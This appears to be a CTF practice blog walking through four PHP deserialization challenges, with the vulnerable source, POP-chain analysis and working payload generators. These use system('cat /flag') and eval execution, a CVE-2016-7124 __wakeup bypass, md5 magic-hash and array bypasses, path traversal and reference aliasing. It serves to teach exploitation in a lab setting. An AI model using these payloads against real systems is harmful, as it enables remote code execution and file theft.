PHP Deserialization Practice (2)

Had a lot of classes today, so I only did 4 problems, still deserialization. Will continue with deserialization tomorrow.

1. [第五空间 2021]pklovecloud

The POP chain is simple: unserialize($_GET['pks']) produces $logData, echo $logData fires acp::__toString(), which calls $this->cinder->echo_name(); with cinder set to an ace object that is ace::echo_name(), which unserializes $this->docker, runs the neutron/nova check and finally does file_get_contents("./{$this->filename}"). cinder is protected, so the serialized string contains \0*\0cinder and has to be URL-encoded.

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?> 

Let's look at the if condition:

$this->openstack->neutron === $this->openstack->nova

The line right before it, $this->openstack->neutron = $heat;, uses a $heat that is never defined, so neutron is overwritten with NULL whatever we put in the serialized data; the strict comparison therefore needs nova to read back as NULL as well. The snippet below serializes a throwaway OpenStack class with both fields set to "value". That still passes on the target, but only because no OpenStack class exists there: unserialize() then returns a __PHP_Incomplete_Class, and every property read on such an object (nova included) just emits a notice and yields NULL, so NULL === NULL holds. An inner object whose nova is actually NULL (for example a serialized acp with all fields left empty) passes without relying on that quirk.


<?php
class OpenStack {
    public $neutron;
    public $nova;
}

// create an OpenStack object
$openstack = new OpenStack();
$openstack->neutron = "value"; // set the neutron property
$openstack->nova = "value";    // set the nova property

// serialize the object
$docker = serialize($openstack);
echo $docker;

?>

O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}
<?php
class acp
{
    protected $cinder;   // protected: serialized as "\0*\0cinder", hence the urlencode() at the end
    public $neutron;
    public $nova;
    function __construct()
    {
        $this->cinder = new ace();   // acp::__toString() on the target calls $this->cinder->echo_name()
    }
}

class ace
{
    public $filename = 'flag.php';   // read via file_get_contents("./{$this->filename}")
    public $openstack;
    // what ace::echo_name() unserializes. OpenStack is not defined on the target, so this
    // becomes a __PHP_Incomplete_Class whose property reads all return NULL, and the
    // neutron === nova check passes as NULL === NULL.
    public $docker = 'O:9:"OpenStack":2:{s:7:"neutron";s:5:"value";s:4:"nova";s:5:"value";}';
}
$a = new acp();
echo urlencode(serialize($a));

?>

flag.php shows a hint.

Then change filename from flag.php to the path the hint points at; the sink is file_get_contents("./{$this->filename}"), so ../ segments walk up from the script's directory:

../../../nssctfasdasdflag

2.[SWPUCTF 2022 新生赛]ez_1zpop

<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

POP chain

fin::fmm()          a = system, title = ls
lt::__toString()    impo = new fin(), md51 = a[], md52 = b[]
lt::__destruct()    echo $this triggers __toString(); __wakeup() has to be bypassed

I thought of using arrays to bypass the comparison, but that didn't work; looking at the writeups, they used weak comparison.

 

$a->md51="s155964671a";
$a->md52="s214587387a";

or

public $md51='240610708';
public $md52='QNKCDZO';

Both pairs are strings whose MD5 digests start with 0e followed only by digits, so md5($md51) == md5($md52) compares two numeric strings as 0 == 0 and passes, while the raw strings still satisfy $md51 != $md52.

POC

<?php
class lt
{
    public $impo;                 // set to a fin object below; __toString() calls $impo->fmm()
    public $md51 = 's214587387a'; // md5() of both starts with "0e": loose == treats them as 0 == 0,
    public $md52 = 's155964671a'; // while the raw strings are still !=
}

class fin
{
    public $a = 'system';         // fmm() does $b = $this->a; $b($this->title)
    public $url = 'https://www.ctfer.vip';
    public $title = 'cat /flag';
}
$a = new lt();
$a->impo = new fin();
echo serialize($a);


O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s214587387a";s:4:"md52";s:11:"s155964671a";}

Note the __wakeup() bypass: lt::__wakeup() replaces impo with a fresh dxg, so __toString() would call dxg::fmm() and only return "nonono". Change the declared property count of the outer object from 3 to 4 (O:2:"lt":4:{...}) so that unserialize() skips __wakeup() (CVE-2016-7124, PHP before 5.6.25 / 7.0.10), and URL-encode the result before sending it as NSS.
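As an added example (not code from the original post), the generator below produces the same object and then applies the __wakeup() bypass by inflating the declared property count of the outer lt object, using a small helper that only rewrites the first matching header so the nested fin object is left intact. It assumes the target runs a PHP still affected by CVE-2016-7124 (before 5.6.25 / 7.0.10), which is what the bypass needs; on a patched interpreter the mismatched count makes unserialize() fail and the chain does not fire.

```php
<?php
// Added example, not code from the original post: the ez_1zpop object with the
// __wakeup() bypass applied. It assumes a target PHP still affected by
// CVE-2016-7124 (before 5.6.25 / 7.0.10): when the declared property count is
// larger than the number of properties actually present, unserialize() skips
// __wakeup() but the object is still created and __destruct() still fires.

class lt
{
    public $impo;
    // md5() of both strings starts with "0e", so the loose == in __toString()
    // compares 0 == 0 while the raw strings still differ.
    public $md51 = 's214587387a';
    public $md52 = 's155964671a';
}

class fin
{
    public $a = 'system';
    public $url = 'https://www.ctfer.vip';
    public $title = 'cat /flag';
}

/**
 * Inflate the declared property count in the header of the first serialized
 * object of class $class. Only the first header is rewritten, so the nested
 * fin object inside lt keeps a correct count and is unserialized normally.
 */
function bump_property_count(string $ser, string $class, int $extra = 1): string
{
    $pattern = sprintf('/O:%d:"%s":(\d+):\{/', strlen($class), preg_quote($class, '/'));
    $out = preg_replace_callback(
        $pattern,
        function (array $m) use ($class, $extra): string {
            return sprintf('O:%d:"%s":%d:{', strlen($class), $class, (int) $m[1] + $extra);
        },
        $ser,
        1
    );
    if ($out === null || $out === $ser) {
        throw new RuntimeException("no serialized object of class $class found");
    }
    return $out;
}

function build_payload(): string
{
    $obj = new lt();
    $obj->impo = new fin();   // __toString() calls $impo->fmm(), i.e. fin::fmm() -> system('cat /flag')
    return bump_property_count(serialize($obj), 'lt');
}

$payload = build_payload();
echo $payload, "\n";
// The string contains '"', '{', ';' and '/', so URL-encode it for the GET parameter.
echo '?NSS=', urlencode($payload), "\n";
```

The helper rewrites only the outer header (O:2:"lt":3:{ becomes O:2:"lt":4:{); the nested O:3:"fin":3:{ stays as it is, because a wrong count there would break the fin object that __toString() needs.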

3. [MoeCTF 2021]unserialize

 <?php

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    function __get($Attribute)
    {
        eval($this->end);
    }
}

if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
} 

POP analysis

evil::__get()            $end = 'system("ls");'
springboard::__call()    $middle = new evil()
entrance::__destruct()   $start = new springboard()

entrance::__destruct() calls $start->helloworld(); springboard has no such method, so __call() runs and reads $this->middle->hs; evil has no hs property, so __get() runs and eval()s $end.

POC (URL-encode the output before putting it in the serialize parameter, since it contains quotes, a slash and semicolons)

<?php
class entrance
{
    public $start;                   // __destruct() calls $start->helloworld()
}

class springboard
{
    public $middle;                  // no helloworld() -> __call() reads $middle->hs
}

class evil
{
    public $end = 'system("cat /flag");';   // no hs property -> __get() runs eval($end)
}
$a = new entrance();
$a->start = new springboard();
$a->start->middle = new evil();
echo serialize($a);


O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}}

4. [FSCTF 2023]ez_php1

md5($a)==md5($b) bypass: GET ?b[]=a&a[]=b (two arrays: on PHP 7 md5() of an array returns NULL, so NULL == NULL passes while the arrays are still != each other), then POST FL_AG=1.

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{
    echo "!!!";
    $c = $_POST['FL_AG'];
    if(isset($c))
    {
        if (preg_match('/^.*(flag).*$/', $ja)) {
            echo 'You are bad guy!!!';
        }
            else {
                echo "Congratulation!!";
                echo $hint1;
            }
    }
    else {
        echo "Please input my love FL_AG";
    }
} else{
    die("game over!");
}
?> 
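The md5($a)==md5($b) && $a!=$b check appears in both ez_1zpop (where the array trick failed and the "0e" strings worked) and ez_php1 (where ?b[]=a&a[]=b worked). As an added example that is not from the original post, the script below contains the vulnerable check, shows why each bypass works, explains the PHP-version difference that makes the array trick fail on PHP 8 (md5() throws a TypeError for a non-string argument there), and contrasts a strict check that resists both. The digests printed are the ones PHP computes for those strings; hash_equals() is the constant-time comparison from the standard library.

```php
<?php
// Added example, not code from the original post: the md5($a)==md5($b) && $a!=$b
// check shared by ez_1zpop and ez_php1, the two bypasses, and a strict version.
error_reporting(0);   // both challenges run with warnings off; keep the demo output clean

/** The check as written in the challenges (loose comparison). */
function weak_check($a, $b): bool
{
    return $a != $b && md5($a) == md5($b);
}

/** Hardened: strings only, strict inequality, constant-time digest comparison. */
function strict_check($a, $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return $a !== $b && hash_equals(md5($a), md5($b));
}

/**
 * Array bypass (?a[]=b&b[]=a in ez_php1). On PHP 5/7 md5() of an array returns
 * NULL (with a warning), so NULL == NULL passes and ['b'] != ['a'] holds.
 * On PHP 8 md5() throws a TypeError for a non-string argument, which is what
 * makes this trick fail there; the TypeError is caught and reported as false.
 */
function array_bypass(): bool
{
    try {
        return weak_check(['b'], ['a']);
    } catch (TypeError $e) {
        return false;
    }
}

/**
 * Magic-hash bypass (the strings used in ez_1zpop). Both digests look like
 * "0e<digits>", and PHP compares two numeric strings numerically, so == sees
 * 0 == 0 on every PHP version; === / hash_equals() compare the bytes and fail.
 */
function magic_hash_bypass(string $x, string $y): bool
{
    return weak_check($x, $y);
}

$pairs = [
    ['s155964671a', 's214587387a'],
    ['240610708',   'QNKCDZO'],
];
foreach ($pairs as [$x, $y]) {
    printf("%-12s %s\n", $x, md5($x));
    printf("%-12s %s\n", $y, md5($y));
    printf("weak_check: %s   strict_check: %s\n\n",
        var_export(magic_hash_bypass($x, $y), true),
        var_export(strict_check($x, $y), true));
}
printf("array bypass on PHP %s: %s\n", PHP_VERSION, var_export(array_bypass(), true));
```

Run it under PHP 7 and PHP 8 to see the array result flip while the magic-hash result stays true; strict_check() is false for every pair in both.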

 

 

Confident people can handwrite the payload directly (a serialized string, s:<length>:"<value>";):    ?str=s:10:"YES I love";

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?> 

Continue handwriting the POC.
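For the Clazz stage above, an added example that is not code from the original post: __wakeup() writes the base64-encoded g0t_f1ag.php into $a only after the properties have been restored, and __destruct() echoes $b, so the payload has to make $b an alias of $a. PHP's serialization format expresses that with R:n (a reference to the n-th value, the object itself being 1), and unserialize() rebuilds it as a real reference that the later assignment in __wakeup() writes through. The script builds that payload and re-checks locally, with a hypothetical stand-in class named ClazzCheck that stores a fixed string instead of reading the file, that the alias survives unserialize().

```php
<?php
// Added example, not code from the original post: build a Clazz payload in
// which $b is a PHP reference to $a. unserialize() restores the reference, so
// whatever __wakeup() later stores in $a is also what __destruct() echoes via $b.

class Clazz
{
    public $a;
    public $b;
}

function build_reference_payload(): string
{
    $obj = new Clazz();
    $obj->b = &$obj->a;      // $b now aliases $a; serialize() emits it as R:2
    return serialize($obj);
}

// Hypothetical stand-in for the challenge class, with the file read replaced by
// a fixed string so the check runs anywhere. Same hook semantics as Clazz.
class ClazzCheck
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = 'set-by-wakeup';
    }

    public function __destruct()
    {
        echo $this->b, "\n";
    }
}

/** Unserialize the payload as ClazzCheck and confirm $b followed the write to $a. */
function alias_survives_unserialize(): bool
{
    $payload = str_replace('O:5:"Clazz":', 'O:10:"ClazzCheck":', build_reference_payload());
    $o = unserialize($payload);
    return $o instanceof ClazzCheck && $o->b === 'set-by-wakeup' && $o->b === $o->a;
}

echo build_reference_payload(), "\n";   // goes into the data POST field as-is
var_dump(alias_survives_unserialize());
```

build_reference_payload() yields O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}. POSTed as data, __wakeup() fills $a with the base64 of g0t_f1ag.php and __destruct() prints it through $b; decode the base64 to read the file.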

If you don't understand, see PHP反序列化(231119)-CSDN博客.

 
